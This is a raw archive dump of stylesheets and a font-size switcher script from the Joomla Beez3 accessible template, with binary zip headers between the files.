	box-shadow: 0 1px 0 rgba(255, 255, 255, .2) inset, 0 1px 2px rgba(0, 0, 0, .05);
	border: solid 1px #ddd;
	border: 1px solid #e5e5e5;
	text-transform: uppercase
}

#header ul.menu a:link, #header ul.menu a:visited {
	color: #333;
	display: inline-block;
	font-weight: 700;
	text-decoration: none;
	padding: 0 10px;
	margin: 0;
	display: inline-block;
	margin: 0 0 0;
	padding: 12px 15px;
	position: relative;
	border-right: 1px solid #ddd;
	box-shadow: 1px 0 0 #f5f5f5
}

.button, button, p.readmore a, #header input.button, .pagenav a:link, .pagenav a:visited, #advanced-search-toggle, .profile-edit a:link, .profile-edit a:visited, h3.js_heading, .article-info {
	background-color: #ddd;
	background-repeat: repeat-x;
	filter: progid:dximagetransform.microsoft.gradient(startColorstr=#ffffff, endColorstr=#dddddd);
	background-image: -khtml-gradient(linear, left top, left bottom, from(#fff), to(#ddd));
	background-image: -moz-linear-gradient(top, #fff, #ddd);
	background-image: -ms-linear-gradient(top, #fff, #ddd);
	background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #fff), color-stop(100%, #ddd));
	background-image: -webkit-linear-gradient(top, #fff, #ddd);
	background-image: -o-linear-gradient(top, #fff, #ddd);
	background-image: linear-gradient(#fff, #ddd);
	border-color: #b2b2b2 #b2b2b2 #9f9f9f;
	text-shadow: 0 1px 1px rgba(255, 255, 255, .49);
	-webkit-font-smoothing: antialiased;
	box-shadow: 0 1px 0 rgba(255, 255, 255, .2) inset, 0 1px 2px rgba(0, 0, 0, .05);
	color: #c00;
	border: solid 1px #ddd
}

.article-info {
	color: #555
}

table {
	border: solid 1px #ddd
}

table th a:link, table th a:visited {
	color: #fff
}

tr.odd, tr.cat-list-row1 {
	background: #f8f8f8
}

table tr:hover td {
	background: #FEFDE2
}

.button:hover, .button:active, .button:focus, button:hover, p.readmore a:hover, #header ul.menu a:hover, #header ul.menu a:active, #header ul.menu a:focus, .pagenav a:hover, .pagenav a:active, .pagenav a:focus, #advanced-search-toggle:hover, #advanced-search-toggle:active, #advanced-search-toggle:focus, .profile-edit a:hover, .profile-edit a:active, .profile-edit a:focus, #fontsize a:hover, #fontsize a:active, #fontsize a:focus, #mobile_select h2 a, table th, .logoheader {
	background-color: #c00;
	background-repeat: repeat-x;
	filter: progid:dximagetransform.microsoft.gradient(startColorstr=#cc0000, endColorstr=#990000);
	background-image: -khtml-gradient(linear, left top, left bottom, from(#c00), to(#900));
	background-image: -moz-linear-gradient(top, #c00, #900);
	background-image: -ms-linear-gradient(top, #c00, #900);
	background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #c00), color-stop(100%, #900));
	background-image: -webkit-linear-gradient(top, #c00, #900);
	background-image: -o-linear-gradient(top, #c00, #900);
	background-image: linear-gradient(#c00, #900);
	border-color: #900;
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0, 0, 0, .33);
	-webkit-font-smoothing: antialiased
}

.pagination span, .pagination span a:hover {
	color: #999;
	background-color: #f5f5f5
}

span.pagenav {
	background: #095197;
	color: #fff
}

.pagination-start span.pagenav, .pagination-prev span.pagenav, .pagination-end span.pagenav, .pagination-next span.pagenav {
	background-color: #f5f5f5;
	color: #444
}

ul.menu a:link, ul.menu a:visited {
	color: #444
}

.moduletable_menu {
	border: solid 1px #ddd;
	background: #f9f9f9
}

#header ul.menu {
	border: solid 1px #D5D5D5;
	box-shadow: 0 1px 0 #fff inset, 0 1px 5px rgba(0, 0, 0, .1)
}

#header ul.menu a {
	box-shadow: none;
	border-bottom: 0
}

ul.menu a:hover, ul.menu a:active, ul.menu a:focus {
	background-color: #F5F5F5;
	background-image: -moz-linear-gradient(center top, #fff, #e6e6e6);
	background-repeat: repeat-x;
	background: url(../images/arrow.png) no-repeat right center;
	color: #c00
}

ul.menu li.active a, ul.menu li.active ul li.active a, ul.menu li.active ul li.active ul li.active a, ul.menu li.active ul li.active ul li.active ul li.active a, ul.menu li.active ul li.active ul li.active ul li.active ul li.active a {
	font-weight: 700
}

ul.menu li.active ul li a, ul.menu li.active ul li.active ul li a, ul.menu li.active ul li.active ul li.active ul li a, ul.menu li.active ul li.active ul li.active ul li.active ul li a {
	font-weight: 400
}

ul.menu a {
	box-shadow: 0 1px 0 #fff;
	border-bottom: solid 1px #ddd;
	text-shadow: 0 1px 0 #fff
}

ul.menu ul a {
	background: #e5e5e5;
	margin-bottom: 1px
}

ul.menu ul ul ul a {
	background: #f5f5f5 url(../images/arrow.png) no-repeat 24px center
}

ul.menu ul ul ul ul a {
	background: #fff
}

.panel h3.pane-toggler a {
	background: url(../images/slider_plus.png) right top no-repeat;
	color: #333
}

.panel h3.pane-toggler-down a {
	background: url(../images/slider_minus.png) right top no-repeat;
	border-bottom: solid 1px #ddd;
	color: #333
}

ul.tabs li, dl.tabs dt h3 a:link, dl.tabs dt h3 a:visited {
	background: #f5f5f5 url(../images/nature/box.png) repeat-x
}

ul.tabs li a:link, ul.tabs li a:visited, dl.tabs dt a {
	color: #333;
	border: solid 1px #ddd;
	border-bottom: 0
}

ul.tabs li a:hover, ul.tabs li a:active, ul.tabs li a:focus {
	color: #000
}

.tabcontent, div.current {
	background: #fff;
	color: #000;
	border: solid 1px #ddd
}

.tabcontent .linkclosed {
	color: #000;
	border-bottom: solid 1px #e5e5e5
}

ul.tabs li a.linkopen, dl.tabs dt.open h3 a:link, dl.tabs dt.open h3 a:visited {
	background: #fff;
	color: #333;
	border-radius: 5px 5px 0 0
}

ul.tabs li a.linkclosed:hover, ul.tabs li a.linkclosed:active, ul.tabs li a.linkclosed:focus, ul.tabs li a.linkopen:hover, ul.tabs li a.linkopen:active, ul.tabs li a.linkopen:focus {
	background: #555;
	color: #fff
}

#footer-inner, #footer {
	background: #f5f5f5;
	box-shadow: 0 20px 10px #555
}

#footer {
	background: #555;
	max-width: 1025px;
	margin: 0 auto;
	box-shadow: 0 0 10px #555;
	color: #fff
}

#footer a {
	color: #fff;
	background: 0
}

#bottom a {
	background: 0
}

.box1 {
	border-right: solid 1px #ccc
}

.box3 {
	border-left: solid 1px #ccc
}

#bottom ul li a {
	background-image: none;
	padding-left: 0
}

#mobile_select h2 {
	border: 0;
	margin: -17px 0 0 0;
	padding: 0;
	background: #900;
	text-align: right
}

#mobile_select h2 a {
	display: inline-block;
	font-size: .8em;
	border-radius: 4px 4px 0 0;
	padding: 6px;
	font-size: .75em;
	margin-right: 5px
}

@media only screen and (max-width: 480px) {
	img {
		max-width: 100%;
		height: auto;
		border: 0;
		-ms-interpolation-mode: bicubic
	}

	#fontsize {
		display: none
	}

	#nav, #wrapper2, #wrapper, .cols-3 .column-1, .cols-3 .column-2, .cols-3 .column-3, #right, .box, #header form {
		float: none;
		width: 100%
	}

	#header {
		padding-top: 3em
	}

	#header form {
		margin: 0
	}

	.logoheader {
		background: #900;
		min-height: 100px;
		margin: 0
	}

	.box {
		border-left: 0 !important;
		border-bottom: solid 1px #ddd
	}

	#line {
		text-align: center;
		top: 0;
		right: auto;
		max-width: 100%;
		min-width: 100%;
		margin: 0 0;
		background: #c00
	}

	#header form input {
		float: none;
		margin-bottom: 4px
	}

	#menuwrapper {
		margin-top: 10px
	}

	#header ul.menu {
		position: relative;
		top: 0;
		left: 20px;
		right: 20px;
		margin: 0;
		width: 90%;
		border-radius: 4px
	}

	#header ul.menu li:first-child a {
		border-radius: 4px 4px 0 0
	}

	#header ul.menu li:last-child a {
		border-radius: 0 0 4px 4px
	}

	#header ul.menu li a:link, #header ul.menu li a:visited {
		display: block;
		padding: 6px 10px;
		border-bottom: solid 1px #ccc
	}
}
PK՜�\1I5'QQbeez3/css/template.cssnu�[���/**
 * @author Design & Accessible Team ( Angie Radtke  )
 * @package Joomla
 * @subpackage Accessible-Template-Beez
 * @copyright (C) 2010 Open Source Matters, Inc. <https://www.joomla.org>
 * @license GNU/GPL, see LICENSE.txt
 * Joomla! is free software. This version may have been modified pursuant to the
 * GNU General Public License, and as distributed it includes or is derivative
 * of works licensed under the GNU General Public License or other free or open
 * source software licenses. See COPYRIGHT.php for copyright notices and
 * details.
 */


body {
    background: #fff;
    color: #000000;
    font-size: 100.1%;
    padding: 0px;
    text-align: center;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
}

body.contentpane {
	width:auto;
	margin:10px;
	text-align: left;
}

img { border: 0 none; }
PK՜�\d��JHJHbeez3/css/layout.cssnu�[���/**
 * @author  ( Angie Radtke  )
 * @package Joomla
 * @subpackage Accessible-Template-Beez
 * @copyright (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license GNU/GPL, see LICENSE.txt
 * Joomla! is free software. This version may have been modified pursuant to the
 * GNU General Public License, and as distributed it includes or is derivative
 * of works licensed under the GNU General Public License or other free or open
 * source software licenses. See COPYRIGHT.php for copyright notices and
 * details.
	/* Typography =================================================== */
body#shadow {
	font-family: arial,sans-serif
}

body h1,body h2,body h3,body h4,body h5,body h6 {
	margin: 0;
	font-family: inherit;
	font-weight: normal;
	color: inherit;
	text-rendering: optimizelegibility;
	word-wrap: break-word;
}

body h1 {
	margin-bottom: 0.75em;
	font-size: 3.6em;
	line-height: 1.2;
}

body h2 {
	margin-bottom: 0.75em;
	font-size: 1.5em;
	line-height: 1.2;
	padding: 5px 0
}

body h3 {
	margin-bottom: 1em;
	font-size: 1.4em;
	line-height: 1.3;
	padding-bottom: 5px
}

body h4 {
	margin-bottom: 1.5em;
	font-size: 1.2em;
	line-height: 1.25;
}

body h5 {
	font-size: 1.1em;
	margin-bottom: 1.5em;
}

body p,body ol,body ul,body dl,body address {
	margin-bottom: 1.5em;
	font-size: 1.0em;
	line-height: 1.5em;
	word-wrap: break-word;
}

small {
	font-size: 0.9em;
}

body ul,body ol {
	margin: 0 0 1.5em 12px;
	padding: 0 0 0 12px;
}

body li ul,body li ol {
	margin: 0;
}


ul.categories-module
{ padding:0; margin:0}


blockquote {
	margin: 0 0 1.5em -24px;
	padding-left: 24px;
	border-left: 2px solid #c7ced6;
	font-style: normal;
}

q {
	quotes: none;
}



cite {
	font-style: normal;
}

abbr[title] {
	border-bottom: 1px dotted #c7ced6;
	cursor: help;
}

b,strong {
	font-weight: bold;
}

dfn {
	font-style: italic;
}

ins {
	text-decoration: none;
}

mark {
	font-style: italic;
	font-weight: bold;
}

pre,code,kbd,samp {
	line-height: 1.5em;
}

pre {
	white-space: pre-wrap;
	}

sub,sup {
	position: relative;
	line-height: 0;
}

sup {
	top: -0.5em;
}

sub {
	bottom: -0.25em;
}

table {
	width: 100%;
	max-width: 100%;
	margin-bottom: 1.5em;
	border-collapse: collapse;
	border-spacing: 0;
	background-color: transparent;
	font-size: 1em
}

table th,table td {
	padding: 8px;
	vertical-align: top;
	border-top: 1px solid #ddd;
	line-height: 1.5em;
	text-align: left;
}

table th {
	font-weight: bold;
	border: 0
}

table thead th {
	vertical-align: bottom;
}

table  tr:first-child th,table tr:first-child td,table thead:first-child tr:first-child th,table thead:first-child tr:first-child td
	{
	border-top: 0;
}

table tbody+tbody {
	border-top: 2px solid #8c9bab;
}

table tbody tr td,table tbody tr th {
	-webkit-transition: background-color 0.25s 0 linear;
	-moz-transition: background-color 0.25s 0 linear;
	-ms-transition: background-color 0.25s 0 linear;
	-o-transition: background-color 0.25s 0 linear;
	transition: background-color 0.25s 0 linear;
}

/* links */
p.readmore a,  .mod-articles-category-readmore a {
	border: 1px solid #CCCCCC;
	border-radius: 3px;
	display: inline-block;
	text-decoration: none;
	margin-bottom: 9px;
	padding: 4px;
	line-height: 1.6em;
}

/* +++++++++++++++++  forms general #######################  */
form {
	margin: 0 0 18px;
}

fieldset {
	border: solid 1px #ddd;
	margin: 10px 0;
	padding: 20px;
	border-radius: 5px
}

fieldset p {
	margin: 0;
	padding: 0;
}

legend {
	font-weight: bold;
	background: #fff;
	padding: 5px 10px
}

label,input,button,select,textarea {
	font-weight: normal;
}

label {
	color: #333333;
	margin-bottom: 5px;
	max-width: 90%
}

input,textarea,select,#advanced-search-toggle, input.search-query {
	border: 1px solid #CCCCCC;
	border-radius: 3px;
	display: inline-block;
	margin-bottom: 9px;
	padding: 4px;
}
.filter-search-lbl {display:inline}
.filter-search, .display-limit {float:left; margin-right:10px}
.button,button,.profile-edit a {
	border-radius: 3px;
	padding: 4px;
	line-height: 1.2em;
	text-decoration: none;
}

label input,label textarea,label select {
	display: block;
}

input[type="image"],input[type="checkbox"],input[type="radio"] {
	border-radius: 0;
	cursor: pointer;
	height: auto;
	line-height: normal;
	margin: 3px 0;
	padding: 0;
	width: auto;
}

input[type="button"],input[type="reset"],input[type="submit"] {
	height: auto;
	width: auto;
}

select {
	height: 28px;
	line-height: 28px;
	max-width:99%}

select {
	width: 220px;
}

select[multiple],select[size] {
	height: auto;
}

textarea {
	height: auto;
}

.radio,.checkbox {
	padding-left: 18px;
}

input[type="radio"],input[type="checkbox"] {
	display: inline;
	 margin-right : 10px;
	 border:none
}

input,textarea {
	-moz-transition: border 0.2s linear 0s, box-shadow 0.2s linear 0s;
	box-shadow: 0 1px 1px rgba(0, 0, 0, 0.075) inset;
}

input:focus,textarea:focus {
	box-shadow: 0 1px 1px rgba(0, 0, 0, 0.075) inset, 0 0 8px
		rgba(82, 168, 236, 0.6);
	outline: 0 none;
}

input[type="file"]:focus,input[type="radio"]:focus,input[type="checkbox"]:focus,select:focus
	{
	box-shadow: none;
	outline-offset: -2px;
}

/* +++++++++++++++++++++++  header searchbox +++++++++++++++++++++  */

#header form {
	overflow: hidden;
	float: right
}
#header form .search {display:inline}
#header input {
	font-weight: bold;
	float: left;
}

#header .inputbox {
	margin-right: 5px
}

/* ++++++++++++++++++++  search component +++++++++++++++++++++++ */

fieldset.word {
	border: 0;
	background: #fff;
	padding: 0
}

fieldset.phrases label,fieldset.only label {
	display: inline;
}

 :root *> fieldset.only label:before {
	background: #a7c7dc;
	background: -moz-linear-gradient(-45deg, #fefefe, #ddd);
	background: -webkit-linear-gradient(-45deg, #fefefe, #ddd);
	background: -o-linear-gradient(-45deg, #fefefe, #ddd);
	background: -ms-linear-gradient(-45deg, #fefefe, #ddd);
	background: linear-gradient(-45deg, #fefefe, #ddd);
	border: 1px solid #aaa;
	border-radius: 3px;
	box-shadow: 0 0 1px 1px #CCCCCC;
	height: 1em;
	margin: 0 4px 0 0;
	text-transform: uppercase;
	width: 1em;
	display: inline-block;
	margin-left: -40px;
	padding: 2px;
	line-height: 1em;
	text-indent: -50px;
}

input[type="checkbox"]:checked+label:before {
	content: "\2714";
	text-indent: 0;
	background: -moz-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: -webkit-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: -o-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: -ms-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: linear-gradient(-45deg, #fefefe, #0b70cd);
	border: 1px solid #0B70CD;
}

:root *> .phrases-box  label:before {
	background: #a7c7dc;
	background: -moz-linear-gradient(-45deg, #fefefe, #ccc);
	background: -webkit-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: -o-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: -ms-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: linear-gradient(-45deg, #fefefe, #0b70cd);
	border: 1px solid #aaa;
	line-height: 1.3em;
	margin: 0 4px 0 0;
	text-transform: uppercase;
	width: 1.3em;
	display: inline-block;
	margin-left: -40px;
	-moz-border-radius: 12px;
	-webkit-border-radius: 12px;
	border-radius: 12px;
	text-indent: -40px;
	color: #fff;
	text-shadow: 0 10px 6px #fff;
}

/*
input[type="radio"]:checked + label:before {
	content: "\2022";
	text-indent: 6px;
	background: -moz-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: -webkit-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: -o-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: -ms-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: linear-gradient(-45deg, #fefefe, #0b70cd);
	color: #000;
	zoom:1;
	border: 1px solid #aaa;
}*/

.ordering-box {
	margin: 10px 0;
}

.search-results dt.result-title {
	padding: 15px 15px 0 5px;
	font-weight: bold;
}

.search-results dd {
	padding: 2px 15px 2px 5px
}

.search-results dd.result-text {
	padding: 10px 15px 10px 5px;
	line-height: 1.7em
}

.search-results dd.result-url {
	font-size: 90%;
	padding: 2px 15px 15px 5px;
}

.search-results dd.result-created {
	padding: 2px 15px 15px 5px
}

.search-results dd.result-category {
	padding: 10px 15px 5px 5px
}

/* Com_search break long titles & text */
dt.result-title {
	word-wrap: break-word;
}

dd.result-text {
	word-wrap: break-word;
}

.advanced-search-tip {
	background: #FEFDE2;
	border-radius: 3px;
	padding: 20px;
	border: solid 1px #ddd
}

.advanced-search-tip p {
	margin: 0
}

.advanced-search-tip .term {
	font-weight: bold;
	font-style: italic
}

.panel {
	border: solid 1px #ddd;
	margin-top: -1px;
}

#main  .panel h3 {
	margin: 0;
	padding: 0;
	background: #eee;
	border: 0;
	font-size: 1.0em
}

.panel h3 a {
	display: block;
	text-decoration: none;
	padding: 6px;
}

.pane-slider {
	border: solid 0;
	padding: 10px;
	margin: 0;
}


/* +++++++++++++++++++  Contact Form +++++++++++++++++++++++++++++++++ */


.panel .contact-form,.panel .contact-miscinfo {
	padding: 10px
}

.contact .panel .contact-form form,.contact .panel .contact-address {
	margin: 20px 0 0 0
}

textarea,.contact-form input[type="text"],.contact-form input[type="email"],.contact-form textarea
	{
	width: 80%;
	-moz-box-sizing: border-box;
	border: 1px solid #DDDDDD;
	color: #333333;
	overflow: auto;
	padding: 5px;
	vertical-align: top;
}

#jform_contact_email_copy-lbl,#jform_contact_email_copy {
	float: left;
	margin-right: 10px;
	border: 0
}

#jform_captcha {
	clear:both;
	padding-bottom:10px;
}

label#jform_captcha-lbl {
	clear: both;
  	position: relative;
  	float: left;
}

.contact-form .button {
	clear: left;
	float: left;
	margin: 20px 0
}

fieldset.filters {
	background: none;
	border: none;
	padding: 0
}

.contact-form,.contact-links,.contact-misc,.contact-image,.contact-contactinfo,.contact-address
	{
	margin: 20px 0
}

/* ++++++++++++++ loginmodule +++++++++++++++++++++++++++ */

#form-login-remember {
	overflow: hidden;
	margin-bottom: 10px
}

#form-login-remember label {
	display: inline;
	margin-left: 10px
}

#modlgn-remember {
	float: left
}

#login-form fieldset {
	background: #f5f5f5
}

#login-form input[type="text"], input[type="password"], input[type="submit"] {
	width: 100%;
	box-sizing: border-box
}

form ul {
	list-style-type: none;
	margin: 0;
	padding: 0
}

/* +++++++++++++++++++++++ pagenav +++++++++++++++++++++++  */
.pagenav {
	text-align: right
}

.pagenav ul {
	display: inline-block;
	*display: inline;
	/* IE7 inline-block hack */
	list-style-type: none;
	margin-left: 0;
	margin-bottom: 0;
}

.pagenav li {
	display: inline;
	margin: 0;
	padding: 0
}

.pagenav a,span.pagenav {
	padding: 0 14px;
	margin: 0;
	text-decoration: none;
	border: 1px solid #ddd;
	border-left: 0 solid #ddd;
	display: inline-block;
	line-height: 1.9em;
}

.pagenav li:first-child a,.pagination-start span {
	-webkit-border-radius: 3px 0 0 3px;
	-moz-border-radius: 3px 0 0 3px;
	border-radius: 3px 0 0 3px;
	border-left: solid 1px #ddd
}

.pagenav li:last-child a,.pagination-end span {
	-webkit-border-radius: 0 3px 3px 0;
	-moz-border-radius: 0 3px 3px 0;
	border-radius: 0 3px 3px 0;
}

.pagination ul {
	margin: 10px 10px 10px 0;
	padding: 0
}

.pagination li {
	display: inline;
}

.pagination a {
	padding: 0 14px;
	line-height: 2em;
	text-decoration: none;
	border: 1px solid #ddd;
	border-left: 0 solid #ddd;
	display: inline-block
}

.pagination .active a {
	cursor: default;
}

.pagination span,.pagination span  a:hover {
	cursor: default;
	padding: 0 14px;
	line-height: 2em;
}

.pagination li:first-child a {
	border-left-width: 1px;
	-webkit-border-radius: 3px 0 0 3px;
	-moz-border-radius: 3px 0 0 3px;
	border-radius: 3px 0 0 3px;
}

.pagination li:last-child a {
	-webkit-border-radius: 0 3px 3px 0;
	-moz-border-radius: 0 3px 3px 0;
	border-radius: 0 3px 3px 0;
}


/* +++++++++++++++++ Breadcrumbs  +++++++++++++++++++++++++++  */

.breadcrumbs,.article-info {
	padding: 7px;
	margin: 0 0 18px;
	list-style: none;
	-webkit-border-radius: 3px;
	-moz-border-radius: 3px;
	border-radius: 3px;
}

.breadcrumbs li {
	display: inline-block;
}

/* +++++++++++++++++ articleinfo /actions  +++++++++++++++++++++++++++  */

ul.actions {
	list-style-type: none;
	text-align: right
}
ul.actions a {padding:0}
ul.actions  li {
	display: inline
}

.article-info-term {
	display: none
}

.article-info {
	overflow: hidden;
	font-size: 0.9em
}

.article-info dd {
	float: left;
	padding: 0 5px;
	border-right: solid 1px #ccc
}

.article-info dd span {
	text-transform: none;
	display: inline-block;
	padding: 0 5px 0 0;
	margin: 0 10px 0 0;
}

.article-info dd.create {
	clear: left
}

/* ######################  header   ###################### */
#fontsize {
	padding: 0;
	margin: 0 20px 0 1px;
	text-align: right;
	margin-bottom: 0;
	float: none;
}

#fontsize h3 {
	padding-right: 0;
	font-weight: normal;
	display: inline;
	font-size: 1em;
	margin: 0
}

#fontsize p {
	margin: 0 0 0 2px;
	padding: 0;
	display: inline;
	font-size: 1em;
}

#fontsize p a {
	margin: 0 2px;
	display: inline;
	padding: 0 5px;
}

/* +++++++++++++++  menus ++++++++++++++++++++++++ */
#header ul.menu {
	padding: 0;
	width: auto;
	text-align: left;
	display: block;
	-webkit-border-radius: 4px 4px 0 0;
	-moz-border-radius: 4px 4px 0 0;
	border-radius: 4px 4px 0 0;
	margin: 0 10px
}

#header ul.menu li {
	display: inline;
	padding: 0;
	margin: 0;
}

#header ul.menu li a:link,#header ul.menu li a:visited,#header ul.menu li:last-child a
	{
	font-weight: bold;
	text-decoration: none;
	margin: 0;
	display: inline-block;
	padding: 12px 15px;
	position: relative;
	border-right: 1px solid #ddd;
	box-shadow: 1px 0 0 #f5f5f5;
}

#header ul.menu li:first-child a {
	border-radius: 4px 0 0 0;
	margin-left: -1px
}

.moduletable_menu {
	border: solid 1px #ddd;
	background: #f9f9f9;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
	padding: 20px;
	margin-bottom: 20px
}

ul.menu {
	margin: 0 0 20px 0;
	padding: 0;
}

ul.menu,ul.menu ul {
	list-style-type: none;
}

ul.menu a {
	display: block;
	margin: 0;
	text-decoration: none;
	padding: 5px 0;
	border-bottom: solid 1px #ddd;
}

ul.menu li:last-child a {
	border: 0;
	box-shadow: none
}

ul.menu ul {
	margin: 0;
	padding: 0
}

ul.menu ul a {
	padding-left: 20px
}

ul.menu ul ul a {
	padding-left: 30px
}

ul.menu ul ul ul a {
	padding-left: 40px
}

ul.menu ul ul ul ul a {
	padding-left: 45px
}

/* ++++++++++++++  content-module ++++++++++++++ */
.category-module {
	margin: 0;
	padding: 0
}

.category-module li {
	padding: 5px 0 5px 0;
	margin: 0;
	list-style-type: none
}

.category-module li h4 {
	margin-bottom: 0
}

.category-module span {
	display: block;
	font-size: 0.85em;
}

.category-module a span {
	display: inline
}

/* content */
.categories-list  .item-title  a {
	text-decoration: none;
	margin-bottom: 20px
}

.category-desc {
	margin: 20px 0
}

.category-desc img {
	float: left;
	margin: 0 20px 10px 0
}

.categories-list dt,.categories-list dd {
	display: inline
}

ul.latestnews li {
	word-wrap: break-word;
}

/* ++++++++++++++++++++++  Footer +++++++++++++++++++++++++ */
#footer-outer
{font-size:0.8em}
.box {
	text-align: left
}

.box ul {
	list-style-type: none
}

#bottom .newsfeed-item {
	padding: 0;
	margin-bottom: 10px
}

.box .moduletable_menu,.box .moduletable {
	margin: 10px
}

.box3 {
	padding-left: 10px
}

.box h3 {
	font-size: 1.3em
}

#footer {
	font-size: 0.8em
}

/*  ####################   Sliding modules  ################## */
.moduletable_js,.moduletable {
	margin-bottom: 20px;
}

.js_heading,.js_heading {
	position: relative;
	display: block;
	padding: 5px 10px;
	margin: 0;
	font-size: 1.40em;
	border-radius: 3px
}

h3.js_heading a {
	display: block;
	position: absolute;
	right: 0;
	top: 0;
	padding: 5px 5px 0 0;
	text-decoration: none;
	background: none
}

.module_content {
	padding: 10px;
	border: solid 1px #ddd;
	border-top: 0;
	border-radius: 0 0 3px 3px;
	margin-top: -1px
}

.no {
	font-size: 1px;
}

.slide {
	height: auto !important;
}

/*  +++++++++++++++++++++++++++++   Module Tabs / Pagebreak Tabs / Contact Tabs ++++++++++++++++ */
ul.tabs {
	margin: 0;
	padding: 0;
	overflow: hidden
}

dl.tabs dt,dl.tabs dd {
	margin: 0;
	padding: 7px 5px;
}

dl.tabs dt h3 {
	font-size: 1em;
	margin: 0;
	padding: 0
}

dl.tabs dt {
	position: relative;
	z-index: 1
}

ul.tabs li,dl.tabs dt {
	list-style-type: none;
	float: left;
	width: auto;
	padding: 0;
	display: block;
	margin: 0 3px 0 0;
	font-size: 1em;
}

ul.tabs li a:link,ul.tabs li a:visited,dl.tabs dt h3 a:link,dl.tabs dt h3 a:visited
	{
	text-decoration: none;
	padding: 7px 5px;
	margin: 0;
	display: block;
	font-size: 0.9em;
	font-weight: normal;
	border-radius: 5px 5px 0 0;
}

ul.tabs li a.linkopen:link,ul.tabs li a.linkopen:visited,dl.tabs dt.open  h3 a:link,dl.tabs dt.open  h3 a:visited
	{
	font-weight: bold;
}

.tabcontent,div.current {
	padding: 30px 20px;
	margin: -1px 0 0 0;
	border-radius: 0 3px 3px 3px;
	clear: left;
}

div.current {
	position: relative;
	top: -1px
}

.tabcontent:focus {
	outline: none
}

.tabopen {
	display: block;
	margin-bottom: 20px;
	overflow: hidden
}

.tabclosed {
	display: none
}

.tabcontent ul {
	padding: 0
}

.tabcontent ul li {
	list-style-type: none
}

/* ++++++++++++++  image float style ++++++++++++++ */
.img-fulltext-left {
	float:left;
	margin-right: 20px;
	margin-bottom: 20px;
}

.img-intro-left {
	float: left;
	margin-right: 10px;
	margin-bottom: 10px;
}

.img-fulltext-right {
	float: right;
	margin-left: 20px;
	margin-bottom: 20px;
}

.img-intro-right {
	float: right;
	margin-left: 10px;
	margin-bottom: 10px;
}

.img-fulltext-none
{display:block;
	margin:10px 0
}

/* Correction for user profile date of birth calendar image */
#jform_profile_dob_img {
	background: url("../images/system/calendar.png") no-repeat scroll 0 0 transparent;
	cursor: pointer;
	height: 18px;
	margin: 0 3px;
	vertical-align: middle;
	width: 18px;
}
/* Smartsearch Calendar*/
#filter_date1_img,
#filter_date2_img {
	background: rgba(0, 0, 0, 0) url("../images/system/calendar.png") no-repeat scroll 0 0;
	cursor: pointer;
	height: 18px;
	margin-left: 3px;
	vertical-align: middle;
	width: 18px;
}
#search-results {
	clear: both;
}
#finder-filter-window {
	overflow: visible;
}
#searchForm .searchintro {
	padding: 0 0 0 250px;
}
.collapse {
	position: relative;
	height: 0;
	overflow: hidden;
	-webkit-transition: height .35s ease;
	-moz-transition: height .35s ease;
	-o-transition: height .35s ease;
	transition: height .35s ease;
}
.collapse.in {
	height: auto;
}
#finder-search .in.collapse {
	overflow: visible;
}
PK՜�\�sR��	�	#beez3/javascript/md_stylechanger.jsnu�[���/*global window, localStorage, fontSizeTitle, bigger, reset, smaller, biggerTitle, resetTitle, smallerTitle, Cookie */
var prefsLoaded = false;
var defaultFontSize = 100;
var currentFontSize = defaultFontSize;



Object.append(Browser.Features, {
	localstorage: (function() {
		return ('localStorage' in window) && window.localStorage !== null;
	})()
});

function setFontSize(fontSize) {
	document.body.style.fontSize = fontSize + '%';
}

function changeFontSize(sizeDifference) {
	currentFontSize = parseInt(currentFontSize, 10) + parseInt(sizeDifference * 5, 10);
	if (currentFontSize > 180) {
		currentFontSize = 180;
	} else if (currentFontSize < 60) {
		currentFontSize = 60;
	}
	setFontSize(currentFontSize);
}

function revertStyles() {
	currentFontSize = defaultFontSize;
	changeFontSize(0);
}

function writeFontSize(value) {
	if (Browser.Features.localstorage) {
		localStorage.fontSize = value;
	} else {
		Cookie.write("fontSize", value, {duration: 180});
	}
}

function readFontSize() {
	if (Browser.Features.localstorage) {
		return localStorage.fontSize;
	} else {
		return Cookie.read("fontSize");
	}
}

function setUserOptions() {
	if (!prefsLoaded) {
		var size = readFontSize();
		currentFontSize = size ? size : defaultFontSize;
		setFontSize(currentFontSize);
		prefsLoaded = true;
	}
}

function addControls() {
	var container = document.id('fontsize');
	var content = '<h3>'+ fontSizeTitle +'</h3><p><a title="'+ biggerTitle +'"  href="#" onclick="changeFontSize(2); return false">'+ bigger +'</a><span class="unseen">.</span><a href="#" title="'+resetTitle+'" onclick="revertStyles(); return false">'+ reset +'</a><span class="unseen">.</span><a href="#"  title="'+ smallerTitle +'" onclick="changeFontSize(-2); return false">'+ smaller +'</a></p>';
	container.set('html', content);
}

function saveSettings() {
	writeFontSize(currentFontSize);
}


window.addEvent('domready', function () {

    smaller = Joomla.JText._('TPL_BEEZ3_SMALLER');
    fontSizeTitle = Joomla.JText._('TPL_BEEZ3_FONTSIZE');
    bigger = Joomla.JText._('TPL_BEEZ3_BIGGER');
    reset = Joomla.JText._('TPL_BEEZ3_RESET');
    biggerTitle = Joomla.JText._('TPL_BEEZ3_INCREASE_SIZE');
    smallerTitle = Joomla.JText._('TPL_BEEZ3_DECREASE_SIZE');
    resetTitle = Joomla.JText._('TPL_BEEZ3_REVERT_STYLES_TO_DEFAULT');

});
window.addEvent('domready', setUserOptions);
window.addEvent('domready', addControls);
window.addEvent('unload', saveSettings);
PK՜�\��t%%beez3/javascript/respond.jsnu�[���/*! matchMedia() polyfill - Test a CSS media type/query in JS. Authors & copyright (c) 2012: Scott Jehl, Paul Irish, Nicholas Zakas. Dual MIT/BSD license */
